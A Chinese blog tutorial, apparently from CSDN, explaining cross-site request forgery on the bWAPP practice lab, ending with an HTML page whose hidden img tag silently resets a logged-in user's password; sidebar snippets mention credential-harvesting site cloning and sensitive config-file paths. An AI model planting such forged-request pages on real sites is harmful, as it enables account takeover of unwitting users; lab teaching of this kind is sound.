31、CSRF漏洞介绍

最新推荐文章于 2021-08-15 17:10:17 发布
最新推荐文章于 2021-08-15 17:10:17 发布
阅读量210 收藏
点赞数
分类专栏: web安全工具库 小课堂 文章标签: CSRF 漏洞介绍
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103814617
版权
CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作
CSRF和XSS区别:
1、CSRF需要登陆后操作,XSS不需要
2、CSRF通过伪装成受信任用户请求受信任的网站

一、环境:BWAPP

二、登陆,默认账号为:bee,密码为:bug

在这里插入图片描述

三、选择从在csrf的页面,将密码修改为1111,change

在这里插入图片描述

四、分析url

http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出账号,重新登陆一下,密码已经修改为1111

六、重修修改一下url,直接访问这个这个地址,

http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change
密码被重置为2222

七、隐蔽利用

1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,
<!DOCTYPE html>
<html>
<head>
	<title>哎呦不错哦。。。</title>
</head>
	<body>
	      <h2>好久不见<h2>
		  <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change">
	</body>
</html>
2、访问这个htmll,自动访问修改后的url,密码也自动修改了
禁止非法,后果自负
欢迎关注公众号:web安全工具库

在这里插入图片描述

web安全工具库
关注
专栏目录
CSRF漏洞
2ed
06-13 1509
CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,...
靶场环境搭建
94小菜
12-27 974
bwapp靶场环境搭建
Beego xsrf处理
Rick的专栏
07-16 2383
服务端 app.conf enablexsrf = true xsrfkey = 61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o xsrfexpire = 3600 Controlle func (this *HomeController) Get(){ this.XSRFExpire = 7200 this.Data["xsrfdata"]=
CSRF漏洞token防御介绍-01
最新发布
09-15
CSRF 漏洞 Token 防御介绍 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的 Web 应用安全漏洞,它允许攻击者在用户不知情的情况下,伪造用户的请求,导致用户执行非预期的操作。为了防御 CSRF 漏洞...
CSRF漏洞详解 一文了解CSRF漏洞
闵行小鱼塘
11-11 2478
本篇总结归纳CSRF漏洞
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
CSRFScanner:Python CSRF漏洞扫描器
05-06
Python CSRF漏洞扫描器 描述 CSRFScanner是一种用于扫描网站以查找CSRF漏洞的工具。 这是一个基本工具,不是很人性化,我最初是出于学术目的而开发的。 可以在PDF CSRFScanner_Explications.pdf(以法语编写)中...
kali工具 -- setoolkit(克隆网站及利用)
热门推荐
weixin_41489908的博客
01-06 1万+
书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你。。。 今天给大家介绍一款克隆网站工具:setoolkit 一、环境:kali 2019.04 二、用法: 1、打开终端,输入setoolkit 2、选择Social-Engineering Attacks 3、选择Website Attack Vectors 4、选择Credential Harvester Attack M...
28、XSS常见payload
weixin_41489908的博客
01-02 5595
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
宽字节注入讲解
weixin_41489908的博客
09-09 5194
我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。 ---- 网易云热评 一、原理 1、单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127) 2、多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 3、宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字 二、addslashes()函数 1、addslashes(..
CMS指纹识别
weixin_41489908的博客
08-13 5181
一、源码目录 1、admin:后台源码 2、content:数据库与源码连接的源码 3、error:报错源码 4、include:包含文件源码 5、config:网站的配置信息 6、index:网站的主页源码 7、init:初始化源码 8、robots:爬虫规则 二、抓包分析cms指纹信息 1、通过BurpSuite抓取访问数据包 2、百度或谷歌搜索这些绝对路径:/e/member/login/loginjs.php?t=,直接就可以知道这是帝国cms 3、在线探
2、CMS识别
weixin_41489908的博客
11-18 4859
打开一个网站,我们可以先看一下该网站的CMS, 推荐使用在线工具: http://whatweb.bugscaner.com/look/ http://www.yunsee.cn/finger.html 也可以手动分析数据包地址的路径,然后百度关键目录,就可以基本判断 禁止非法,后果自负 ...
获取网站绝对路径常用方法
weixin_41489908的博客
08-15 3587
始终相信那些尝遍人生百味的人,灵魂会更加生动且干净。。。 ---- 网易云热评 一、报错显示 搜索inurl:warning,查看百度快照 二、搜索敏感文件 inurl:phpinfo.php 三、Windows下常用路径 c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码c:/winnt/php.inic:/winnt/my.i.
18、cookie注入(base64加密)
weixin_41489908的博客
12-09 3266
环境sqli-labs less 21 1、通过抓包,我们发现cookie是base64编码的,解密后是admin 2、我们输入特殊符号,看报错信息,特殊符号也需要base64编码 3、我们通过’)进行闭合,返回正常 4、后面带入相关的查询语句并用Base64编码。查询语句参照less 20 less 22 用的是双引号闭合,注入语句同上。 禁止非法,后果自负 欢迎关注公众号:web安...
sql注入常用函数
weixin_41489908的博客
11-18 3231
​当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。 ---- 网易云热评 一、MySql注入常用函数 1、system_user()系统用户名 2、user()用户名 3、current_user()当前用户名 4、session_user()链接数据库的用户名 5、database()数据库名 6、version()数据库版本 7、@@datadir数据库路径 8、@@basedir数据库安装路径 9、@@version_conpile_os操作系统.
web service渗透测试
weixin_41489908的博客
10-30 2423
​在街上看见一个人像你,我瞬间特别紧张,渴望是你,又害怕是你,直到看清不是你,我庆幸不是你,有遗憾不是你。。。 ---- 网易云热评 一、什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件,..
深度解析:CSRF漏洞原理与防御策略
CSRF漏洞,全称为Cross-Site Request Forgery,是一种常见的Web安全问题,常常被列入OWASP十大最严重安全漏洞之列。它与XSS和SQL注入并列为网络安全三大主要威胁。尽管CSRF的关注度相对较低,但它潜在的危害不容忽视...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值